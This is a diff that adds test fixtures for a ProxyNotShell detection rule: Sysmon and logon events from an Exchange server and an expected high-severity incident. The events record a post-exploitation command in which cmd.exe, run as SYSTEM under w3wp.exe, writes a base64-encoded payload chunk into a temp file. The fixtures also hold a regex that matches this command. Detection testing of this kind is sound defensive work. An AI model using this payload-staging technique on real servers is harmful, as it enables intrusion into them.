"object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c echo 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>>%%TEMP%%\\RsJnf.b64", "object.process.cwd": "c:\\windows\\system32\\inetsrv\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "d5e182b9-2e60-6424-c625-000000002700", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "911D039E71583A07320B32BDE22F8E22", "object.process.hash.sha256": "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.process.id": "2276", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangePowerShellAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipm6ed2a926-10ba-4360-834b-895310382a0a -h \"C:\\inetpub\\temp\\apppools\\MSExchangePowerShellAppPool\\MSExchangePowerShellAppPool.config\" -w \"\" -m 0", "object.process.parent.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "object.process.parent.guid": "d5e182b9-3724-641b-d100-000000002700", "object.process.parent.id": "10384", "object.process.parent.name": "w3wp.exe", "object.process.parent.path": "c:\\windows\\system32\\inetsrv\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1697 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-04-03T09:59:22.529Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", 
"subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-03-29T12:26:08.946Z", "type": "raw", "uuid": "f15a1c1b-c289-4061-8603-6aaf687d1569"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-03-29T12:26:10.052174000Z\"},\"EventRecordID\":\"6959912\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3184\",\"ThreadID\":\"4760\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"exchange.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-03-29 12:26:10.050\",\"Name\":\"UtcTime\"},{\"text\":\"{d5e182b9-2e62-6424-c825-000000002700}\",\"Name\":\"ProcessGuid\"},{\"text\":\"7524\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Name\":\"Image\"},{\"text\":\"10.0.17763.1697 (WinBuild.160101.0800)\",\"Name\":\"FileVersion\"},{\"text\":\"Windows Command Processor\",\"Name\":\"Description\"},{\"text\":\"Microsoft® Windows® Operating System\",\"Name\":\"Product\"},{\"text\":\"Microsoft Corporation\",\"Name\":\"Company\"},{\"text\":\"Cmd.Exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /c echo 
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>>%%TEMP%%\\\\RsJnf.b64\",\"Name\":\"CommandLine\"},{\"text\":\"c:\\\\windows\\\\system32\\\\inetsrv\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"NT 
AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"},{\"text\":\"{d5e182b9-36b7-641b-e703-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0x3e7\",\"Name\":\"LogonId\"},{\"text\":\"0\",\"Name\":\"TerminalSessionId\"},{\"text\":\"System\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18\",\"Name\":\"Hashes\"},{\"text\":\"{d5e182b9-3724-641b-d100-000000002700}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"10384\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\"Name\":\"ParentImage\"},{\"text\":\"c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe -ap \\\"MSExchangePowerShellAppPool\\\" -v \\\"v4.0\\\" -c \\\"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\bin\\\\GenericAppPoolConfigWithGCServerEnabledFalse.config\\\" -a \\\\\\\\.\\\\pipe\\\\iisipm6ed2a926-10ba-4360-834b-895310382a0a -h \\\"C:\\\\inetpub\\\\temp\\\\apppools\\\\MSExchangePowerShellAppPool\\\\MSExchangePowerShellAppPool.config\\\" -w \\\"\\\" -m 0\",\"Name\":\"ParentCommandLine\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "d5e182b9-36b7-641b-e703-000000000000", "event_src.category": "Other", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", 
"object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c echo 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>>%%TEMP%%\\RsJnf.b64", "object.process.cwd": "c:\\windows\\system32\\inetsrv\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "d5e182b9-2e62-6424-c825-000000002700", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "911D039E71583A07320B32BDE22F8E22", "object.process.hash.sha256": "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.process.id": "7524", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangePowerShellAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipm6ed2a926-10ba-4360-834b-895310382a0a -h \"C:\\inetpub\\temp\\apppools\\MSExchangePowerShellAppPool\\MSExchangePowerShellAppPool.config\" -w \"\" -m 0", "object.process.parent.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "object.process.parent.guid": "d5e182b9-3724-641b-d100-000000002700", "object.process.parent.id": "10384", "object.process.parent.name": "w3wp.exe", "object.process.parent.path": "c:\\windows\\system32\\inetsrv\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1697 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-04-03T09:59:22.529Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", 
"subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-03-29T12:26:10.050Z", "type": "raw", "uuid": "b07ebac2-d06f-4de1-b74d-f1444a26e12c"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.regex_match": "/c echo ...>>%%temp%%\\rsjnf.b64", "category.generic": "Attack", "category.high": "Initial Access", "category.low": "Exploit Public-Facing Application", "correlation_name": "ProxyNotShell", "correlation_type": "incident", "datafield6": "d5e182b9-36b7-641b-e703-000000000000", "detect": "CVE-2022-41040|CVE-2022-41082", "dst.fqdn": "exchange.example.com", "dst.host": "exchange.example.com", "dst.hostname": "exchange", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "ProxyNotShell|exchange.example.com|k_ivanov", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c echo 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>>%%TEMP%%\\RsJnf.b64", "object.process.cwd": "c:\\windows\\system32\\inetsrv\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "d5e182b9-2e60-6424-c625-000000002700", "object.process.id": "2276", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | 
Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangePowerShellAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipm6ed2a926-10ba-4360-834b-895310382a0a -h \"C:\\inetpub\\temp\\apppools\\MSExchangePowerShellAppPool\\MSExchangePowerShellAppPool.config\" -w \"\" -m 0", "object.process.parent.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "object.process.parent.guid": "d5e182b9-3724-641b-d100-000000002700", "object.process.parent.id": "10384", "object.process.parent.name": "w3wp.exe", "object.process.parent.path": "c:\\windows\\system32\\inetsrv\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1697 (WinBuild.160101.0800)", "src.host": "rhangnsivabvi", "src.hostname": "rhangnsivabvi", "src.ip": "10.155.1.6", "src.port": 45342, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1999687082-732736654-454791560-1114", "subject.account.name": "k_ivanov", "subject.account.privileges": "local user rights", "subject.account.session_id": "883698059"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_2.sc new file mode 100644 index 00000000..f4f4dfd9 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_2.sc 
@@ -0,0 +1,6 @@ +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-03-29T12:26:08.920039600Z\"},\"EventRecordID\":\"8695702\",\"Correlation\":{\"ActivityID\":\"{4f904282-5ce1-0000-b842-904fe15cd901}\"},\"Execution\":{\"ProcessID\":\"620\",\"ThreadID\":\"19016\"},\"Channel\":\"Security\",\"Computer\":\"exchange.example.com\",\"Security\":null},\"EventData\":{\"Data\":[{\"text\":\"S-1-0-0\",\"Name\":\"SubjectUserSid\"},{\"text\":\"-\",\"Name\":\"SubjectUserName\"},{\"text\":\"-\",\"Name\":\"SubjectDomainName\"},{\"text\":\"0x0\",\"Name\":\"SubjectLogonId\"},{\"text\":\"S-1-5-21-1999687082-732736654-454791560-1114\",\"Name\":\"TargetUserSid\"},{\"text\":\"k_ivanov\",\"Name\":\"TargetUserName\"},{\"text\":\"example\",\"Name\":\"TargetDomainName\"},{\"text\":\"0x34abfbec\",\"Name\":\"TargetLogonId\"},{\"text\":\"3\",\"Name\":\"LogonType\"},{\"text\":\"NtLmSsp \",\"Name\":\"LogonProcessName\"},{\"text\":\"NTLM\",\"Name\":\"AuthenticationPackageName\"},{\"text\":\"nBnaxyPFEkbxE\",\"Name\":\"WorkstationName\"},{\"text\":\"{00000000-0000-0000-0000-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"-\",\"Name\":\"TransmittedServices\"},{\"text\":\"NTLM 
V2\",\"Name\":\"LmPackageName\"},{\"text\":\"128\",\"Name\":\"KeyLength\"},{\"text\":\"0x0\",\"Name\":\"ProcessId\"},{\"text\":\"-\",\"Name\":\"ProcessName\"},{\"text\":\"10.155.1.6\",\"Name\":\"IpAddress\"},{\"text\":\"45248\",\"Name\":\"IpPort\"},{\"text\":\"%%1833\",\"Name\":\"ImpersonationLevel\"},{\"text\":\"-\",\"Name\":\"RestrictedAdminMode\"},{\"text\":\"-\",\"Name\":\"TargetOutboundUserName\"},{\"text\":\"-\",\"Name\":\"TargetOutboundDomainName\"},{\"text\":\"%%1843\",\"Name\":\"VirtualAccount\"},{\"text\":\"0x0\",\"Name\":\"TargetLinkedLogonId\"},{\"text\":\"%%1843\",\"Name\":\"ElevatedToken\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "chain_id": "4f904282-5ce1-0000-b842-904fe15cd901", "datafield6": "Network", "datafield9": "NTLM", "dst.fqdn": "exchange.example.com", "dst.host": "exchange.example.com", "dst.hostname": "exchange", "event_src.category": "AAA", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "NtLmSsp", "logon_type": 3, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "system", "object.property": "session ID with ElevatedToken", "object.value": "0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-04-03T10:05:03.447Z", "src.host": "nbnaxypfekbxe", "src.hostname": "nbnaxypfekbxe", "src.ip": "10.155.1.6", "src.port": 45248, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1999687082-732736654-454791560-1114", "subject.account.name": "k_ivanov", 
